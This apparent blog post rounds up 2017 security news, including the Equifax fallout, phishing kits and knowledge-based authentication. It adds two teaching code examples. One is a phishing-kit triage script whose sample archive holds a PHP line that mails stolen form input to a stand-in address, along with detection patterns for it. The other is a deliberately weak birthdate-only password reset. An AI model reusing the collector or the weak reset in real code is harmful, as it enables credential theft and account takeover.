Friday, November 03, 2017

What’s bad for Equifax is bad for everyone?
Not surprisingly, states are responding to the Equifax breach, but they are taking different approaches. Here is how two states are responding:
Law.com reports that in New York:
Attorney General Eric Schneiderman is proposing comprehensive legislation to tighten data security laws and expand protections.
The Stop Hacks and Improve Electronic Data Security Act, introduced this week in the Legislature, would require companies that handle New Yorkers’ sensitive data to adopt “reasonable administrative, technical and physical protections for data” regardless of where the company is headquartered, Schneiderman’s office said in a news release Thursday. It would cover credit reporting agencies such as Equifax as well as many other types of companies that collect personally identifiable information on individuals.
And Vermont Public Radio reports:
Chittenden County Sen. Michael Sirotkin says he heard from more constituents about the Equifax breach than almost any other issue he’s dealt with as a lawmaker. Sirotkin says he’s now putting the finishing touches on legislation that would give Vermonters new legal options for similar breaches in the future.
“So what that means is that consumers will have a private right of action, if this bill passes, where they will be able to get their damages for their time and expense and their attorneys’ fees and the cost of repairing the problem,” Sirotkin said Thursday at a press conference announcing the legislation.




Another example of Equifax security?
Equifax Reopens Salary Lookup Service
Equifax has re-opened a Web site that lets anyone look up the salary history of a large portion of the American workforce using little more than a person’s Social Security number and their date of birth. The big-three credit bureau took the site down just hours after I wrote about it on Oct. 8, and began restoring the site eight days later saying it had added unspecified “security enhancements.”




When we’ll help and when we’ll hack.
At a series of events earlier in October, White House Cybersecurity Coordinator Rob Joyce announced that he is preparing to release more information about the Vulnerabilities Equities Process (VEP). 
As we’ve discussed before, the VEP is a complicated yet important process that determines whether the government will notify a digital-technology company about a cybersecurity flaw in its product or service, or choose not to disclose the flaw and use it for later hacking or intelligence-gathering purposes.




A “new tech” security issue.
Shadow IT Growth Introducing Huge Compliance Risks: Report
Shadow IT continues to grow, while senior management remains in denial. The average enterprise now uses 1,232 cloud apps (up 33% from the second half of last year), while CIOs still believe their organizations use between just 30 and 40 cloud apps and services. Within this cloud, 20% of all stored data is at risk of being 'broadly shared'.
The figures come from 1H 2017 Shadow Data Report (PDF), based on aggregated and anonymized data from 22,000 cloud apps and services, 465 million documents, and 2.3 billion emails used by Symantec's CloudSOC (CASB) customers.




For my Ethical Hackers and my Computer Security students.
Analysis of 3,200 Phishing Kits Sheds Light on Attacker Tools and Techniques
Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target medium's login page (Gmail, Facebook, Office 365, targeted banks, etc.), and a pre-written PHP script to steal the credentials -- both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing; not spear-phishing.
Duo Security R&D engineer Jordan Wright found and analyzed a single phishing kit; and decided to investigate the extent of their use. The results were published this week in a new report (PDF).
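The excerpt above describes the two parts of a commodity kit (a cloned login page plus a PHP collector that mails results or appends them to a text file). The following triage helper is an added example, not code from the article or from Duo's report: it inspects a zip archive in memory and reports exactly those indicators, which is the check an incident responder runs when a kit turns up on a compromised web host or in a mail attachment. The archive it analyzes is constructed inline for the demo; the file names, the `example.invalid` address and the regexes are assumptions, not values from the page.

```python
"""Triage helper for a suspected phishing-kit zip archive (added example)."""
import io
import re
import zipfile

# Indicators drawn from the article's description of a basic kit:
# a PHP collector that reads form input and either mails it to the
# operator or appends it to a local text file. Patterns are assumptions.
MAIL_RE = re.compile(r'\bmail\s*\(\s*["\']([^"\']+@[^"\']+)["\']')
FILE_APPEND_RE = re.compile(r'\bfopen\s*\([^)]*,\s*["\']a|\bFILE_APPEND\b')
POST_RE = re.compile(r'\$_(?:POST|REQUEST)\b')


def triage_kit(zip_bytes: bytes) -> dict:
    """Summarize a zip archive without extracting it to disk.

    Returns which files are HTML (the cloned page), which are PHP, every
    address passed as the first argument of mail(), whether any script
    appends to a file, and whether any script reads form input.
    """
    summary = {
        "html_files": [],
        "php_files": [],
        "mail_recipients": [],
        "appends_to_file": False,
        "reads_form_input": False,
    }
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            lower = name.lower()
            if lower.endswith((".html", ".htm")):
                summary["html_files"].append(name)
            elif lower.endswith(".php"):
                summary["php_files"].append(name)
                # Decode leniently: kits are often mis-encoded or obfuscated.
                src = zf.read(info).decode("utf-8", errors="replace")
                summary["mail_recipients"].extend(MAIL_RE.findall(src))
                if FILE_APPEND_RE.search(src):
                    summary["appends_to_file"] = True
                if POST_RE.search(src):
                    summary["reads_form_input"] = True
    summary["mail_recipients"] = sorted(set(summary["mail_recipients"]))
    # A page plus a collector that reads input and exfiltrates it somewhere
    # is the shape the article describes; flag it for an analyst.
    summary["looks_like_credential_kit"] = bool(
        summary["html_files"]
        and summary["php_files"]
        and summary["reads_form_input"]
        and (summary["mail_recipients"] or summary["appends_to_file"])
    )
    return summary


def build_sample_kit() -> bytes:
    """Constructed sample archive for the demo; not a real kit."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("login.html", "<form method='post' action='post.php'></form>")
        zf.writestr(
            "post.php",
            "<?php $d = $_POST['user'];\n"
            'mail("drop@example.invalid", "r", $d);\n'
            'file_put_contents("log.txt", $d, FILE_APPEND); ?>',
        )
        zf.writestr("img/logo.png", b"\x89PNG constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_kit(build_sample_kit()))
```

The recipient addresses are the most useful output: they can be blocked at the mail gateway and, because kit authors reuse them, correlated across incidents. The archive is never extracted, so a malformed or hostile zip cannot write outside a working directory.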




For my Computer Security students' Midterm: How would you prevent this?
Rogue Twitter employee on last day of job deactivated Trump’s personal account, company says
President Trump boasted Friday of his social media influence after his personal Twitter account was briefly deactivated by a departing company employee, raising serious questions about the security of tweets the president wields to set major policy agendas, connect with his voter base and lash out at his adversaries.
The deactivation Thursday sparked deep and troubling questions about who has access to the president's personal account, @realDonaldTrump, and the power that access holds. The deactivation also came at a time when the social network is under scrutiny for the role it played in spreading Russian propaganda during the 2016 presidential election.
At 8:05 p.m., at the same time Trump was tweeting about tax revisions, the company posted a statement saying the president's “account was inadvertently deactivated due to human error by a Twitter employee.”
“The account was down for 11 minutes, and has since been restored,” the statement read. “We are continuing to investigate and are taking steps to prevent this from happening again.”
But two hours later, the company admitted that the deactivation wasn't an accident at all: A preliminary investigation revealed that the account was taken offline “by a Twitter customer support employee who did this on the employee's last day.”


(Related). Another potential question?
Security Sense: How Do You Do Knowledge Based Authentication When All Knowledge is Public?
Have a think about the ways you identify yourself to institutions, both commercial and government. Think about the process you go through in order to establish that you are indeed yourself and it’s not someone else pretending to be you. In particular, consider the sorts of questions you’re asked in order to establish enough confidence on behalf of that institution that they should now proceed with granting you whatever it was you contacted them for in the first place. Very often, you’re asked to partake in what’s referred to as Knowledge Based Authentication or KBA and that’s something we’ve now got a real problem with.
Consider the sorts of questions you’re usually asked, a classic one being your date of birth. This has always been a ludicrous KBA question because it’s a personal attribute we willingly share with others, simply because most of us like cake and presents. Yet we have cases like Betfair using only that and an email address to reset your password. No, you don’t have to actually receive an email, you just simply say “here’s an email and a birthdate and here’s the password I’d like that account to have”. Now that’s an extreme example and I believe they’ve since seen the futility of that approach and made some changes, but date of birth is still frequently a part of the KBA process.
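The Betfair flow described above (email address plus birthdate, no mail ever received, new password set on the spot) is the failure mode of treating public attributes as secrets. The code below is an added example, not anything from the column or from Betfair: it puts that weak reset beside a token-based reset in which the proof is possession of the mailbox on file, and the token is random, hashed at rest, single-use and time-limited. The user record, the address and the 15-minute lifetime are constructed for the demo; SHA-256 stands in for a real password KDF (scrypt, bcrypt or Argon2) to keep the example dependency-free.

```python
"""Weak KBA-style password reset beside a token-based reset (added example)."""
import hashlib
import secrets
import time
from typing import Optional

# Constructed user store for the demo. The birthdate is the kind of
# "secret" the column points out is routinely shared in public.
USERS = {
    "alice@example.invalid": {
        "birthdate": "1985-04-12",
        "password_hash": hashlib.sha256(b"old-password").hexdigest(),
    }
}


def _hash_password(password: str) -> str:
    # Demo only: a production system uses a slow, salted KDF here.
    return hashlib.sha256(password.encode()).hexdigest()


def weak_reset(email: str, birthdate: str, new_password: str) -> bool:
    """The flow the column criticizes: email + birthdate is enough to
    set a new password, and nothing is sent to the mailbox. Anyone who
    knows the victim's birthday passes this check."""
    user = USERS.get(email)
    if user is None or user["birthdate"] != birthdate:
        return False
    user["password_hash"] = _hash_password(new_password)
    return True


# Hardened flow: the only "knowledge" that counts is a fresh random token
# delivered to the address on file. Tokens are stored hashed so a leaked
# table cannot be replayed, expire after TOKEN_TTL_SECONDS, and are
# consumed on first use.
TOKEN_TTL_SECONDS = 900
_pending = {}  # sha256(token) -> (email, expiry timestamp)


def request_reset(email: str, now: Optional[float] = None) -> Optional[str]:
    """Issue a reset token for a registered address.

    For the demo the token is returned so the test can use it; a real
    endpoint hands it to the mailer only and gives the caller the same
    generic response whether or not the address exists."""
    now = time.time() if now is None else now
    if email not in USERS:
        return None
    token = secrets.token_urlsafe(32)
    key = hashlib.sha256(token.encode()).hexdigest()
    _pending[key] = (email, now + TOKEN_TTL_SECONDS)
    return token


def complete_reset(token: str, new_password: str, now: Optional[float] = None) -> bool:
    """Set a new password only for the holder of a live, unused token."""
    now = time.time() if now is None else now
    key = hashlib.sha256(token.encode()).hexdigest()
    entry = _pending.pop(key, None)  # single use: gone after one attempt
    if entry is None:
        return False
    email, expiry = entry
    if now > expiry:
        return False
    USERS[email]["password_hash"] = _hash_password(new_password)
    return True


if __name__ == "__main__":
    print("weak reset with public data:", weak_reset("alice@example.invalid", "1985-04-12", "pwned"))
    tok = request_reset("alice@example.invalid")
    print("token reset, wrong token:", complete_reset("not-the-token", "x"))
    print("token reset, real token:", complete_reset(tok, "better-password"))
    print("token reused:", complete_reset(tok, "again"))
```

The point of the comparison is that `weak_reset` never involves the account owner at all, while `complete_reset` cannot succeed without something only the mailbox owner receives; date of birth can still be collected as a hint for support staff, but it should never be the gate.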




Will this still be a good investment in the age of self-driving cars and Uber-like services?
Parking Spaces That Could Make You Rich
Marc Wisotsky and his partner, Jackie Lew, bought two spaces in 2005 in a parking garage near their home in Park Slope, Brooklyn, for around $45,000 each. They used one and rented out the other for $600 a month, pocketing $310 after taxes and the garage fee.
It was a tidy, reliable income, Mr. Wisotsky said, but the real payoff came when he and Ms. Lew sold their extra space last year for $285,000. “We could have gotten more — the prices just keep going up and up,” he said. “There are never as many parking spaces as residential units being built.”




If you are a JFK conspiracy nut, go away and read this. Great idea for a free demo!
E-discovery firm opens access to fully searchable database of JFK assassination records collection
by Sabrina I. Pacifici on Nov 2, 2017
ABA Journal: “The legal review software company iCONECT has digitized some JFK assassination records and is offering free access for 60 days. Launched Oct. 30, the company imported 6,701 public documents from the John F. Kennedy Assassination Records Collection to its Xera platform, including audio files. A user can now search various fields to find relevant information. This is an improvement over the National Archives’ repository of these documents, which are in PDF format and non-searchable, according to a press release. iCONECT also “built a search index, charts, graphs, quick-search folders and word-highlight reports for all the records,” according to the release. A user can even auto-mark CIA cryptonyms found throughout the document set.”




For the student toolkit.




New is not necessarily mainstream.
Blockchain development is now the second-hottest skill in the job market today, growing more than 200% since this time last year.
Blockchain developers now rank second among the top 20 fastest-growing job skills, and job postings for workers with those skills have more than doubled this year.


(Related)
One Bitcoin Transaction Now Uses as Much Energy as Your House in a Week

